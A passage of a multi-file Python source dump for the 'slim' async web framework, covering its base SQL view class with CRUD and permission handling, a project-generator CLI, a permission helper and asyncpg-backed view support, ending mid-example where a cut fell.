from ..utils import pagination_calc, MetaClassForInit, async_call, get_ioloop, sync_call
from ..utils.json_ex import json_ex_dumps
from ..exception import RecordNotFound, SyntaxException, InvalidParams, SQLOperatorInvalid, ColumnIsNotForeignKey, \
ColumnNotFound, InvalidRole, PermissionDenied, FinishQuitException, SlimException, TableNotFound, \
ResourceException, NotNullConstraintFailed, AlreadyExists, InvalidPostData, NoUserViewMixinException
logger = logging.getLogger(__name__)
class BaseView(metaclass=MetaClassForInit):
"""
    Scanning of all interfaces and creation of the wrapper functions should be
    completed at cls_init time; the view is instantiated inside the wrapper,
    which passes in the request object.
"""
_interface = {}
_no_route = False
# permission: Permissions # 3.6
@classmethod
def use(cls, name, method: [str, Set, List], url=None):
""" interface helper function"""
if not isinstance(method, (str, list, set, tuple)):
raise BaseException('Invalid type of method: %s' % type(method).__name__)
if isinstance(method, str):
method = {method}
# TODO: check methods available
cls._interface[name] = [{'method': method, 'url': url}]
@classmethod
def use_lst(cls, name):
cls._interface[name] = [
{'method': {'GET'}, 'url': '%s/{page}' % name},
{'method': {'GET'}, 'url': '%s/{page}/{size}' % name},
]
@classmethod
def discard(cls, name):
""" interface helper function"""
cls._interface.pop(name, None)
@classmethod
def interface(cls):
pass
@classmethod
def cls_init(cls):
cls._interface = {}
cls.interface()
for k, v in vars(cls).items():
if isinstance(v, FunctionType):
if getattr(v, '_interface', None):
cls.use(k, *v._interface)
@property
def permission(self) -> Permissions:
return self.app.permission
def __init__(self, app: Application, aiohttp_request: BaseRequest = None):
self.app = app
if aiohttp_request is None:
self._request = mock.Mock()
else:
self._request = aiohttp_request
self.ret_val = None
self.response = None
self.session = None
self._cookie_set = None
self._params_cache = None
self._post_data_cache = None
self._post_json_cache = None
self._current_user = None
self._current_user_roles = None
self.temp_storage = {}
@property
def is_finished(self):
return self.response is not None
async def _prepare(self):
        # If fetching the current user is a coroutine function, resolve it ahead of time
if self.can_get_user:
func = getattr(self, 'get_current_user', None)
if func:
if asyncio.iscoroutinefunction(func):
self._current_user = await func()
session_cls = self.app.options.session_cls
self.session = await session_cls.get_session(self)
async def prepare(self):
pass
async def _on_finish(self):
if self.session:
await self.session.save()
async def on_finish(self):
pass
async def get_x_forwarded_for(self) -> List[Union[IPv4Address, IPv6Address]]:
lst = self._request.headers.getall(hdrs.X_FORWARDED_FOR, [])
if not lst: return []
lst = map(str.strip, lst[0].split(','))
return [ip_address(x) for x in lst if x]
async def get_ip(self) -> Union[IPv4Address, IPv6Address]:
"""
get ip address of client
:return:
"""
xff = await self.get_x_forwarded_for()
if xff: return xff[0]
ip_addr = self._request.transport.get_extra_info('peername')[0]
return ip_address(ip_addr)
@property
def can_get_user(self):
return isinstance(self, BaseUserViewMixin)
@property
def current_user(self) -> BaseUser:
if not self.can_get_user:
raise NoUserViewMixinException("Current View should inherited from `BaseUserViewMixin` or it's subclasses")
if not self._current_user:
func = getattr(self, 'get_current_user', None)
if func:
                # Only resolve it here when it is not a coroutine function
if not asyncio.iscoroutinefunction(func):
self._current_user = func()
else:
self._current_user = None
return self._current_user
@property
def roles(self) -> Set:
if not self.can_get_user:
raise NoUserViewMixinException("Current View should inherited from `BaseUserViewMixin` or it's subclasses")
if self._current_user_roles is not None:
return self._current_user_roles
else:
u = self.current_user
self._current_user_roles = {None} if u is None else set(u.roles)
return self._current_user_roles
@property
def retcode(self):
if self.is_finished:
return self.ret_val['code']
def _finish_end(self):
for i in self._cookie_set or ():
if i[0] == 'set':
self.response.set_cookie(i[1], i[2], **i[3])
else:
self.response.del_cookie(i[1])
def finish(self, code, data=NotImplemented):
"""
Set response as {'code': xxx, 'data': xxx}
:param code:
:param data:
:return:
"""
if data is NotImplemented:
data = RETCODE.txt_cn.get(code, None)
        self.ret_val = {'code': code, 'data': data}  # for access in inherited methods
self.response = web.json_response(self.ret_val, dumps=json_ex_dumps)
logger.debug('finish: %s' % self.ret_val)
self._finish_end()
def finish_raw(self, body: bytes, status: int = 200, content_type: Optional[str] = None):
"""
Set raw response
:param body:
:param status:
:param content_type:
:return:
"""
self.ret_val = body
self.response = web.Response(body=body, status=status, content_type=content_type)
logger.debug('finish: raw body(%d bytes)' % len(body))
self._finish_end()
def del_cookie(self, key):
if self._cookie_set is None:
self._cookie_set = []
self._cookie_set.append(('del', key))
@property
def params(self) -> dict:
if self._params_cache is None:
self._params_cache = dict(self._request.query)
return self._params_cache
async def _post_json(self) -> dict:
# post body: raw(text) json
if self._post_json_cache is None:
self._post_json_cache = dict(await self._request.json())
return self._post_json_cache
async def post_data(self) -> dict:
if self._post_data_cache is not None:
return self._post_data_cache
if self._request.content_type == 'application/json':
# post body: raw(text) json
self._post_data_cache = dict(await self._request.json())
else:
# post body: form data
self._post_data_cache = dict(await self._request.post())
logger.debug('raw post data: %s', self._post_data_cache)
return self._post_data_cache
def set_cookie(self, key, value, *, path='/', expires=None, domain=None, max_age=None, secure=None,
httponly=None, version=None):
if self._cookie_set is None:
self._cookie_set = []
kwargs = {'path': path, 'expires': expires, 'domain': domain, 'max_age': max_age, 'secure': secure,
'httponly': httponly, 'version': version}
self._cookie_set.append(('set', key, value, kwargs))
def get_cookie(self, name, default=None):
if self._request.cookies is not None and name in self._request.cookies:
return self._request.cookies.get(name, default)
return default
def set_secure_cookie(self, name, value: bytes, *, httponly=True, max_age=30):
        # Generally speaking this is UTC
# https://stackoverflow.com/questions/16554887/does-pythons-time-time-return-a-timestamp-in-utc
timestamp = int(time.time())
# version, utctime, name, value
        # assert isinstance(value, (str, list, tuple, bytes, int))
to_sign = [1, timestamp, name, value]
secret = self.app.options.cookies_secret
self.set_cookie(name, create_signed_value(secret, to_sign), max_age=max_age, httponly=httponly)
def get_secure_cookie(self, name, default=None, max_age_days=31):
secret = self.app.options.cookies_secret
value = self.get_cookie(name)
if value:
data = decode_signed_value(secret, value)
            # TODO: handle expiry based on max_age_days
if data and data[2] == name:
return data[3]
return default
@property
def headers(self) -> CIMultiDictProxy:
return self._request.headers
@property
def route_info(self):
"""
info matched by router
:return:
"""
return self._request.match_info
@classmethod
def _ready(cls):
""" private version of cls.ready() """
sync_call(cls.ready)
@classmethod
def ready(cls):
"""
All modules loaded, and ready to serve.
Emitted after register routes and before loop start
:return:
"""
pass
class ViewOptions:
def __init__(self, *, list_page_size=20, list_accept_size_from_client=False, list_page_size_client_limit=None,
permission: Permissions = None):
self.list_page_size = list_page_size
self.list_accept_size_from_client = list_accept_size_from_client
self.list_page_size_client_limit = list_page_size_client_limit
if permission:
self.permission = permission
def assign(self, obj: Type["AbstractSQLView"]):
obj.LIST_PAGE_SIZE = self.list_page_size
obj.LIST_PAGE_SIZE_CLIENT_LIMIT = self.list_page_size_client_limit
obj.LIST_ACCEPT_SIZE_FROM_CLIENT = self.list_page_size_client_limit
if isinstance(self.permission, Permissions):
obj.permission = self.permission
class ErrorCatchContext:
def __init__(self, view: "AbstractSQLView"):
self.view = view
def __enter__(self):
pass
def __exit__(self, exc_type, exc_val: Exception, exc_tb):
# FinishQuitException
if isinstance(exc_val, FinishQuitException):
return True # Finished, do nothing
# SyntaxException
elif isinstance(exc_val, SyntaxException):
self.view.finish(RETCODE.FAILED, exc_val.args[0])
# ParamsException
elif isinstance(exc_val, SQLOperatorInvalid):
self.view.finish(RETCODE.INVALID_PARAMS, "Invalid operator for select condition: %r" % exc_val.args[0])
elif isinstance(exc_val, ColumnIsNotForeignKey):
self.view.finish(RETCODE.INVALID_PARAMS, "This column is not a foreign key: %r" % exc_val.args[0])
elif isinstance(exc_val, InvalidParams):
if len(exc_val.args):
self.view.finish(RETCODE.INVALID_PARAMS, exc_val.args[0])
else:
self.view.finish(RETCODE.INVALID_PARAMS)
elif isinstance(exc_val, InvalidPostData):
if len(exc_val.args) and exc_val.args[0].startswith('Column bad value'):
self.view.finish(RETCODE.INVALID_POSTDATA, exc_val.args[0])
else:
self.view.finish(RETCODE.INVALID_POSTDATA)
# ResourceException
elif isinstance(exc_val, TableNotFound):
self.view.finish(RETCODE.FAILED, exc_val.args[0])
elif isinstance(exc_val, ColumnNotFound):
self.view.finish(RETCODE.FAILED, "Column not found: %r" % exc_val.args[0])
elif isinstance(exc_val, RecordNotFound):
if len(exc_val.args) > 0:
self.view.finish(RETCODE.NOT_FOUND, 'Nothing found from table %r' % exc_val.args[0])
else:
self.view.finish(RETCODE.NOT_FOUND, 'Nothing found from table %r' % self.view.table_name)
elif isinstance(exc_val, NotNullConstraintFailed):
self.view.finish(RETCODE.INVALID_POSTDATA, 'NOT NULL constraint failed')
elif isinstance(exc_val, AlreadyExists):
self.view.finish(RETCODE.ALREADY_EXISTS)
elif isinstance(exc_val, ResourceException):
self.view.finish(RETCODE.FAILED, exc_val.args[0])
# PermissionException
elif isinstance(exc_val, InvalidRole):
self.view.finish(RETCODE.INVALID_ROLE, "Invalid role: %r" % exc_val.args[0])
elif isinstance(exc_val, PermissionDenied):
if len(exc_val.args):
self.view.finish(RETCODE.PERMISSION_DENIED, exc_val.args[0])
else:
self.view.finish(RETCODE.PERMISSION_DENIED)
# others
elif isinstance(exc_val, SlimException):
self.view.finish(RETCODE.FAILED)
else:
return # 异常会传递出去
return True
class AbstractSQLView(BaseView):
_sql_cls = AbstractSQLFunctions
is_base_class = True # skip cls_init check
options_cls = ViewOptions
    LIST_PAGE_SIZE = 20  # default size of a single list fetch; -1 means fetch everything
    LIST_PAGE_SIZE_CLIENT_LIMIT = None  # None means same as LIST_PAGE_SIZE; -1 means unlimited
LIST_ACCEPT_SIZE_FROM_CLIENT = False
table_name = None
primary_key = None
fields = {}
foreign_keys = {}
foreign_keys_table_alias = {}
# table_name: str = None
# primary_key: str = None
# fields: Dict[str, SQL_TYPE] = {}
# foreign_keys: Dict[str, List[SQLForeignKey]] = {}
# foreign_keys_table_alias: Dict[str, str] = {} # hide real table name
@classmethod
def _is_skip_check(cls):
skip_check = False
if 'is_base_class' in cls.__dict__:
skip_check = getattr(cls, 'is_base_class')
return skip_check
@classmethod
def interface(cls):
# super().interface() # 3.5, super(): empty __class__ cell
cls.use('get', 'GET')
cls.use_lst('list')
cls.use('update', 'POST')
cls.use('new', 'POST')
cls.use('delete', 'POST')
# deprecated
cls.use('set', 'POST')
@classmethod
def add_soft_foreign_key(cls, column, table_name, alias=None):
"""
the column stores foreign table's primary key but isn't a foreign key (to avoid constraint)
warning: if the table not exists, will crash when query with loadfk
:param column: table's column
:param table_name: foreign table name
:param alias: table name's alias. Default is as same as table name.
:return: True, None
"""
if column in cls.fields:
table = SQLForeignKey(table_name, column, cls.fields[column], True)
if alias:
if alias in cls.foreign_keys_table_alias:
logger.warning("This alias of table is already exists, overwriting: %s.%s to %s" %
(cls.__name__, column, table_name))
cls.foreign_keys_table_alias[alias] = table
if column not in cls.foreign_keys:
cls.foreign_keys[column] = [table]
else:
if not alias:
logger.warning("The soft foreign key will not work, an alias required: %s.%s to %r" %
(cls.__name__, column, table_name))
cls.foreign_keys[column].append(table)
return True
@classmethod
def _check_view_options(cls):
options = getattr(cls, 'options', None)
if options and isinstance(options, ViewOptions):
options.assign(cls)
@classmethod
def cls_init(cls, check_options=True):
if check_options:
cls._check_view_options()
# because of BaseView.cls_init is a bound method (@classmethod)
# so we can only route BaseView._interface, not cls._interface defined by user
BaseView.cls_init.__func__(cls)
# super().cls_init() # fixed in 3.6
assert isinstance(cls.LIST_PAGE_SIZE, int), '%s.LIST_PAGE_SIZE must be int' % cls.__name__
assert cls.LIST_PAGE_SIZE == -1 or cls.LIST_PAGE_SIZE > 0, \
'%s.LIST_PAGE_SIZE must be -1 or more than 0' % cls.__name__
assert cls.LIST_PAGE_SIZE_CLIENT_LIMIT is None or isinstance(cls.LIST_PAGE_SIZE_CLIENT_LIMIT, int), \
'%s.LIST_PAGE_SIZE_CLIENT_LIMIT must be None or int' % cls.__name__
if isinstance(cls.LIST_PAGE_SIZE_CLIENT_LIMIT, int):
assert cls.LIST_PAGE_SIZE_CLIENT_LIMIT == -1 or cls.LIST_PAGE_SIZE_CLIENT_LIMIT > 0, \
'%s.LIST_PAGE_SIZE must be None or -1 or more than 0' % cls.__name__
async def func():
await cls._fetch_fields(cls)
if not cls._is_skip_check():
assert cls.table_name
assert cls.fields
# assert cls.primary_key
# assert cls.foreign_keys
get_ioloop().run_until_complete(func())
def _load_role(self, role):
user = self.current_user if self.can_get_user else None
self.ability = self.permission.request_role(user, role)
return self.ability
@property
def current_request_role(self) -> [int, str]:
"""
Current role requested by client.
:return:
"""
role_val = self.headers.get('Role')
return int(role_val) if role_val and role_val.isdigit() else role_val
async def _prepare(self):
await super()._prepare()
# _sql uses self.err to store data,
# so under concurrency a class-level cls._sql.err would be shared by multiple requests and cause errors
self._sql = self._sql_cls(self.__class__)
if not self._load_role(self.current_request_role):
logger.debug("load role %r failed, please check permission settings of View %r"
" (mapping to table %r)." %
(self.current_request_role, type(self).__name__, type(self).table_name))
raise InvalidRole(self.current_request_role)
async def load_fk(self, info: SQLQueryInfo, records: Iterable[DataRecord]) -> Union[List, Iterable]:
"""
:param info:
:param records: the data got from database and filtered from permission
:return:
"""
# if not items, items is probably [], so return itself.
# if not items: return items
# 1. get tables' instances
# table_map = {}
# for column in info['loadfk'].keys():
# tbl_name = self.foreign_keys[column][0]
# table_map[column] = self.app.tables[tbl_name]
# 2. get query parameters
async def check(data, records):
for column, fkvalues_lst in data.items():
for fkvalues in fkvalues_lst:
pks = []
all_ni = True
vcls = self.app.tables[fkvalues['table']]
for i in records:
val = i.get(column, NotImplemented)
if val != NotImplemented:
all_ni = False
pks.append(val)
if all_ni:
logger.debug("load foreign key failed, do you have read permission to the column %r?" % column)
continue
# 3. query foreign keys
v = vcls(self.app, self._request) # fake view
await v._prepare()
info2 = SQLQueryInfo()
info2.set_select(ALL_COLUMNS)
info2.add_condition(PRIMARY_KEY, SQL_OP.IN, pks)
info2.bind(v)
# ability = vcls.permission.request_role(self.current_user, fkvalues['role'])
# info2.check_query_permission_full(self.current_user, fktable, ability)
try:
fk_records, count = await v._sql.select_page(info2, size=-1)
except RecordNotFound:
# no value found for the foreign key; perhaps they are all null, which is common
continue
# if not fk_records: continue
await v.check_records_permission(info2, fk_records)
fk_dict = {}
for i in fk_records:
# primary key: record
fk_dict[i[vcls.primary_key]] = i
column_to_set = fkvalues.get('as', column) or column
for _, record in enumerate(records):
k = record.get(column, NotImplemented)
if k in fk_dict:
record[column_to_set] = fk_dict[k]
if fkvalues['loadfk']:
await check(fkvalues['loadfk'], fk_records)
await check(info.loadfk, records)
return records
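# The `loadfk` query parameter is a JSON object keyed by column name; each value may
# be null, a dict with optional 'table', 'as' and nested 'loadfk' keys, or a list of
# such dicts to resolve one column against several tables. Examples taken from the
# tests further down in this dump:
#   loadfk={"link_id": null}
#   loadfk={"link_id": {"as": "link"}}
#   loadfk={"link_id": {"loadfk": {"link_id": null}}}
#   loadfk={"id": [{"table": "t2", "as": "t2"}, {"table": "t1", "as": "t1"}]}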
async def _call_handle(self, func, *args):
""" call and check result of handle_query/read/insert/update """
await async_call(func, *args)
if self.is_finished:
raise FinishQuitException()
def _get_list_page_and_size(self) -> Tuple[int, int]:
page = self.route_info.get('page', '1').strip()
if not page.isdigit():
raise InvalidParams("`page` is not a number")
page = int(page)
client_size = self.route_info.get('size', '').strip()
if self.LIST_ACCEPT_SIZE_FROM_CLIENT and client_size:
page_size_limit = self.LIST_PAGE_SIZE_CLIENT_LIMIT or self.LIST_PAGE_SIZE
if client_size == '-1': # -1 means all
client_size = -1
elif client_size.isdigit(): # size >= 0
client_size = int(client_size)
if client_size == 0:
# use default value
client_size = page_size_limit
else:
if page_size_limit != -1:
client_size = min(client_size, page_size_limit)
else:
raise InvalidParams("`size` is not a number")
else:
client_size = self.LIST_PAGE_SIZE
return page, client_size
async def check_records_permission(self, info, records):
user = self.current_user if self.can_get_user else None
for record in records:
columns = record.set_info(info, self.ability, user)
if not columns: raise RecordNotFound(self.table_name)
await self._call_handle(self.after_read, records)
async def get(self):
with ErrorCatchContext(self):
info = SQLQueryInfo(self.params, view=self)
await self._call_handle(self.before_query, info)
record = await self._sql.select_one(info)
if record:
records = [record]
await self.check_records_permission(info, records)
data_dict = await self.load_fk(info, records)
self.finish(RETCODE.SUCCESS, data_dict[0])
else:
self.finish(RETCODE.NOT_FOUND)
async def list(self):
with ErrorCatchContext(self):
page, size = self._get_list_page_and_size()
info = SQLQueryInfo(self.params, view=self)
await self._call_handle(self.before_query, info)
records, count = await self._sql.select_page(info, size, page)
await self.check_records_permission(info, records)
if count:
if size == -1: size = count
pg = pagination_calc(count, size, page)
records = await self.load_fk(info, records)
pg["items"] = records
self.finish(RETCODE.SUCCESS, pg)
else:
self.finish(RETCODE.NOT_FOUND)
async def update(self):
with ErrorCatchContext(self):
info = SQLQueryInfo(self.params, self)
raw_post = await self.post_data()
values = SQLValuesToWrite(raw_post)
await self._call_handle(self.before_query, info)
record = await self._sql.select_one(info)
if record:
records = [record]
values.bind(self, A.WRITE, records)
await self._call_handle(self.before_update, raw_post, values, records)
logger.debug('update record(s): %s' % values)
new_records = await self._sql.update(records, values, returning=True)
await self.check_records_permission(None, new_records)
await self._call_handle(self.after_update, raw_post, values, records, new_records)
if values.returning:
self.finish(RETCODE.SUCCESS, new_records[0])
else:
self.finish(RETCODE.SUCCESS, len(new_records))
else:
self.finish(RETCODE.NOT_FOUND)
set = update
async def new(self):
with ErrorCatchContext(self):
raw_post = await self.post_data()
values = SQLValuesToWrite(raw_post, self, A.CREATE)
values_lst = [values]
logger.debug('insert record(s): %s' % values_lst)
# note: only a single record is passed; the new interface does not yet support inserting several at once
await self._call_handle(self.before_insert, raw_post, values)
records = await self._sql.insert(values_lst, returning=True)
await self.check_records_permission(None, records)
await self._call_handle(self.after_insert, raw_post, values_lst[0], records[0])
if values.returning:
self.finish(RETCODE.SUCCESS, records[0])
else:
self.finish(RETCODE.SUCCESS, len(records))
async def delete(self):
with ErrorCatchContext(self):
info = SQLQueryInfo(self.params, self)
await self._call_handle(self.before_query, info)
record = await self._sql.select_one(info)
if record:
records = [record]
user = self.current_user if self.can_get_user else None
logger.debug('request permission: [%s] of table %r' % (A.DELETE, self.table_name))
for record in records:
valid = self.ability.can_with_record(user, A.DELETE, record, available=record.keys())
if len(valid) == len(record.keys()):
logger.debug("request permission successed: %r" % list(record.keys()))
else:
logger.debug(
"request permission failed. valid / requested: %r, %r" % (valid, list(record.keys())))
return self.finish(RETCODE.PERMISSION_DENIED)
await self._call_handle(self.before_delete, records)
num = await self._sql.delete(records)
await self._call_handle(self.after_delete, records)
self.finish(RETCODE.SUCCESS, num)
else:
self.finish(RETCODE.NOT_FOUND)
@staticmethod
@abstractmethod
async def _fetch_fields(cls_or_self):
"""
4 values must be set up in this function:
1. cls.table_name: str
2. cls.primary_key: str
3. cls.fields: Dict['column', SQL_TYPE]
4. cls.foreign_keys: Dict['column', List[SQLForeignKey]]
:param cls_or_self:
:return:
"""
pass
async def before_query(self, info: SQLQueryInfo):
pass
async def after_read(self, records: List[DataRecord]):
"""
One-to-many; an exception is raised as soon as any single permission check fails
:param records:
:return:
"""
pass
async def before_insert(self, raw_post: Dict, values: SQLValuesToWrite):
"""
One-to-one
:param raw_post:
:param values:
:return:
"""
pass
async def after_insert(self, raw_post: Dict, values: SQLValuesToWrite, record: DataRecord):
"""
One-to-one
Emitted before finish
:param raw_post:
:param values:
:param record:
:return:
"""
pass
async def before_update(self, raw_post: Dict, values: SQLValuesToWrite, records: List[DataRecord]):
"""
One-to-many; an exception is raised as soon as any single permission check fails
raw_post is the data before permission and column filtering, values is the data after filtering
:param raw_post:
:param values:
:param records:
:return:
"""
pass
async def after_update(self, raw_post: Dict, values: SQLValuesToWrite,
old_records: List[DataRecord], records: List[DataRecord]):
"""
:param old_records:
:param raw_post:
:param values:
:param records:
:return:
"""
async def before_delete(self, records: List[DataRecord]):
"""
:param records:
:return:
"""
pass
async def after_delete(self, deleted_records: List[DataRecord]):
"""
:param deleted_records:
:return:
"""
pass
@staticmethod
@abstractmethod
async def permission_valid_check(cls):
"""
To make sure the current permission settings fit the sql tables.
:param cls:
:return:
"""
pass
```
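For orientation, here is a minimal sketch of how a concrete view built on this base class is typically declared, using the PeeweeView support module that appears in the tests further down in this dump; the `Topic` model, its columns, and the route name are illustrative and not taken from the file above, and the hook names are the ones defined by AbstractSQLView.
```python
from peewee import SqliteDatabase, Model, TextField, IntegerField
from slim import Application, ALL_PERMISSION
from slim.base.sqlquery import SQLQueryInfo
from slim.support.peewee import PeeweeView

app = Application(cookies_secret=b'example-secret', permission=ALL_PERMISSION)
db = SqliteDatabase(':memory:')


class Topic(Model):
    # illustrative model, not part of the file above
    title = TextField()
    views = IntegerField(default=0)

    class Meta:
        database = db


db.create_tables([Topic])


@app.route('topic')
class TopicView(PeeweeView):
    model = Topic

    async def before_query(self, info: SQLQueryInfo):
        # runs before every get/list/update query; a place to force extra conditions
        pass

    async def after_read(self, records):
        # runs after the permission check on fetched records
        pass
```
The `get`, `list`, `new`, `update` and `delete` handlers then come from the base class as shown above; only the hooks need overriding.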
#### File: slim/slim_cli/main.py
```python
import os
import click
import base64
import shutil
from os.path import join
src_dir = os.path.dirname(os.path.abspath(__file__))
def gen(project_dir, project_name):
shutil.copytree(join(src_dir, 'template'), project_dir)
config_file = join(project_dir, 'config.py')
fp = open(config_file, encoding='utf-8')
txt = fp.read()
fp.close()
txt = txt.replace("PROJECT_NAME = 'SlimApplication'", "PROJECT_NAME = '%s'" % project_name.title())
txt = txt.replace(' = b"6aOO5ZC55LiN5pWj6ZW/5oGo77yM6Iqx5p+T5LiN6YCP5Lmh5oSB44CC"', ' = %r' % base64.b64encode(os.urandom(48)))
fp = open(config_file, 'w+', encoding='utf-8')
fp.write(txt)
fp.close()
return True
@click.group()
def cli():
pass
@cli.command(help='generate a new project from template')
@click.option('--name', prompt='Project Name', default=None)
def init(name):
click.echo('Start a web application.')
project_dir = name
if os.path.exists(project_dir):
print('Already Exists!')
return
if gen(project_dir, name):
print('OK!')
if __name__ == '__main__':
cli()
```
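One way to exercise the generator above without installing a console script is click's built-in test runner; the import path and project name below are assumptions, so treat this as a sketch only.
```python
from click.testing import CliRunner

# import path assumed from the file header above (slim/slim_cli/main.py)
from slim.slim_cli.main import cli

runner = CliRunner()
with runner.isolated_filesystem():
    result = runner.invoke(cli, ['init', '--name', 'demo_project'])
    print(result.output)  # ends with 'OK!' when the template copy succeeded
```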
#### File: permissions/tables/_vars.py
```python
from model.user import POST_STATE
from slim.base.sqlquery import SQLQueryInfo, SQL_OP
from slim.base.permission import Ability
from permissions.roles import *
post_state_conditions = [
('state', '>', POST_STATE.DEL),
]
def add_post_visible_limit(table):
visitor.add_query_condition(table, post_state_conditions)
normal_user.add_query_condition(table, post_state_conditions)
```
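For context, a table-specific permission module would typically call the helper above for any table holding post-like rows; the table name below is only an example.
```python
from permissions.tables._vars import add_post_visible_limit

# 'topic' is a hypothetical table name; after this call, only rows whose state is
# greater than POST_STATE.DEL remain queryable by the visitor and normal_user roles
# imported from permissions.roles
add_post_visible_limit('topic')
```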
#### File: support/asyncpg/view.py
```python
import binascii
from typing import Type
from asyncpg import Record
from ...base.permission import A, DataRecord, Permissions
from ...retcode import RETCODE
from ...support.asyncpg import query
from ...utils import to_bin, pagination_calc, dict_filter, bool_parse
from ...exception import SyntaxException
from ...base.view import AbstractSQLView, AbstractSQLFunctions, ViewOptions
# noinspection SqlDialectInspection,SqlNoDataSourceInspection
_field_query = '''SELECT a.attname as name, col_description(a.attrelid,a.attnum) as comment,
pg_type.typname as typename, a.attnotnull as notnull
FROM pg_class as c,pg_attribute as a inner join pg_type on pg_type.oid = a.atttypid
where c.relname = $1 and a.attrelid = c.oid and a.attnum>0;'''
_fk_query = '''
SELECT a.attname, c2.relname
FROM pg_class as c, pg_class as c2, pg_attribute as a,
pg_CONSTRAINT as con
WHERE c.oid = con.conrelid -- join the constraint to its table's OID
and c.relname = $1 -- look up the OID of the current table
and con.confrelid = c2.oid -- resolve the name of the referenced table
and a.attrelid = c.oid -- find the column attributes of this table
and a.attnum=ANY(con.conkey); -- match the foreign key positions to concrete columns
'''
class AsyncpgDataRecord(DataRecord):
# noinspection PyMissingConstructor
def __init__(self, table_name, val: Record):
self.table = table_name
self.val = val  # kept only for completeness
def keys(self):
return self.val.keys()
def get(self, key):
return self.val[key]
def has(self, key):
return key in self.val
def to_dict(self, available_columns=None):
if available_columns:
return dict_filter(self.val, available_columns)
return dict(self.val)
class AsyncpgSQLFunctions(AbstractSQLFunctions):
def _get_args(self, args):
nargs = []
# note: args may be used several times, so do not mutate their contents
for i in args:
i = i[:]
field = self.vcls.fields[i[0]]
type_codec = field['typename']
# https://www.postgresql.org/docs/9.6/static/datatype.html
# asyncpg/protocol/protocol.pyx
# import asyncpg.protocol.protocol
conv_func = None
if type_codec in ['int2', 'int4', 'int8']:
type_codec = 'int'
conv_func = int
elif type_codec in ['float4', 'float8']:
type_codec = 'float'
conv_func = float
elif type_codec == 'bytea':
conv_func = to_bin
elif type_codec == 'bool':
conv_func = bool_parse
if conv_func:
try:
if i[1] == 'in':
i[2] = list(map(conv_func, i[2]))
else:
i[2] = conv_func(i[2])
except binascii.Error:
self.err = RETCODE.INVALID_PARAMS, 'Invalid query value for blob: Odd-length string'
return
except ValueError as e:
self.err = RETCODE.INVALID_PARAMS, ' '.join(map(str, e.args))
nargs.append([*i, type_codec])
return nargs
def _get_data(self, data):
ndata = {}
for k, v in data.items():
field = self.vcls.fields[k]
type_codec = field['typename']
if type_codec in ['int2', 'int4', 'int8']:
# type_codec = 'int'
v = int(v)
elif type_codec in ['float4', 'float8']:
# type_codec = 'float'
v = float(v)
elif type_codec == 'bytea':
# type_codec = 'bytea'
v = to_bin(v)
ndata[k] = v
return ndata
async def select_one(self, info):
view = self.vcls
nargs = self._get_args(info['conditions'])
if self.err: return self.err
sc = query.SelectCompiler()
sql = sc.select(info['select']).from_table(view.table_name).simple_where_many(nargs)\
.order_by_many(info['orders']).sql()
ret = await view.conn.fetchrow(sql[0], *sql[1])
if not ret: return RETCODE.NOT_FOUND, NotImplemented
if ret:
return RETCODE.SUCCESS, AsyncpgDataRecord(view.table_name, ret)
else:
return RETCODE.NOT_FOUND, NotImplemented
async def select_paginated_list(self, info, size, page):
nargs = self._get_args(info['conditions'])
if self.err: return self.err
sc = query.SelectCompiler()
sql = sc.select_count().from_table(self.vcls.table_name).simple_where_many(nargs)\
.order_by_many(info['orders']).sql()
count = (await self.vcls.conn.fetchrow(sql[0], *sql[1]))['count']
pg = pagination_calc(count, size, page)
if size == -1: size = count # get all
offset = size * (page - 1)
sc.reset()
sql = sc.select(info['select']).from_table(self.vcls.table_name).simple_where_many(nargs) \
.order_by_many(info['orders']).limit(size).offset(offset).sql()
ret = await self.vcls.conn.fetch(sql[0], *sql[1])
func = lambda item: AsyncpgDataRecord(self.vcls.table_name, item)
pg["items"] = list(map(func, ret))
return RETCODE.SUCCESS, pg
async def update(self, info, data):
view = self.vcls
nargs = self._get_args(info['conditions'])
if self.err: return self.err
columns = view.ability.can_with_columns(None, A.WRITE, view.table_name, data.keys())
if not columns:
return RETCODE.PERMISSION_DENIED, NotImplemented
ndata = self._get_data(dict_filter(data, columns))
uc = query.UpdateCompiler()
sql = uc.to_table(view.table_name).simple_where_many(nargs).set_values(ndata).sql()
ret = await view.conn.execute(sql[0], *sql[1]) # ret == "UPDATE X"
if ret and ret.startswith("UPDATE "):
num = int(ret[len("UPDATE "):])
return RETCODE.SUCCESS, {'count': num}
else:
return RETCODE.FAILED, NotImplemented
async def insert(self, data):
ndata = self._get_data(data)
ic = query.InsertCompiler()
sql = ic.into_table(self.vcls.table_name).set_values(ndata).returning().sql()
ret = await self.vcls.conn.fetchrow(sql[0], *sql[1])
return RETCODE.SUCCESS, AsyncpgDataRecord(self.vcls.table_name, ret)
class AsyncpgViewOptions(ViewOptions):
def __init__(self, *, list_page_size=20, list_accept_size_from_client=False, permission: Permissions = None,
conn=None, table_name: str=None):
self.conn = conn
self.table_name = table_name
super().__init__(list_page_size=list_page_size, list_accept_size_from_client=list_accept_size_from_client,
permission=permission)
def assign(self, obj: Type['AsyncpgView']):
if self.conn:
obj.conn = self.conn
if self.table_name:
obj.table_name = self.table_name
super().assign(obj)
class AsyncpgView(AbstractSQLView):
is_base_class = True
options_cls = AsyncpgViewOptions
conn = None
table_name = None
@classmethod
def cls_init(cls, check_options=True):
# py3.6: __init_subclass__
skip_check = False
if 'is_base_class' in cls.__dict__:
skip_check = getattr(cls, 'is_base_class')
if skip_check:
if not (cls.__name__ == 'AsyncpgView' and AbstractSQLView in cls.__bases__):
assert cls.conn, "%s.conn must be specified." % cls.__name__
assert cls.table_name, "%s.table_name must be specified." % cls.__name__
AbstractSQLView.cls_init.__func__(cls, False)
# super().cls_init(False)
@staticmethod
async def _fetch_fields(cls_or_self):
if cls_or_self.table_name:
info = await cls_or_self.conn.fetch(_field_query, cls_or_self.table_name)
if not info:
raise SyntaxException("Table not found: %s" % cls_or_self.table_name)
ret = {}
for i in info:
ret[i['name']] = i
cls_or_self.fields = ret
info = await cls_or_self.conn.fetch(_fk_query, cls_or_self.table_name)
ret = {}
for i in info:
ret[i['attname']] = [i['relname']]
cls_or_self.foreign_keys = ret
@staticmethod
async def permission_valid_check(cls):
pass
```
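A minimal sketch of a concrete view on top of this support module; the DSN, the table name and the bootstrapping order are assumptions, and in a real project the connection would come from wherever the application sets up its database.
```python
import asyncio

import asyncpg
from slim import Application, ALL_PERMISSION
from slim.support.asyncpg.view import AsyncpgView

app = Application(cookies_secret=b'example-secret', permission=ALL_PERMISSION)

# the connection must exist before the view class is initialised, because cls_init
# asserts `conn` and `table_name` and then introspects the table's columns and
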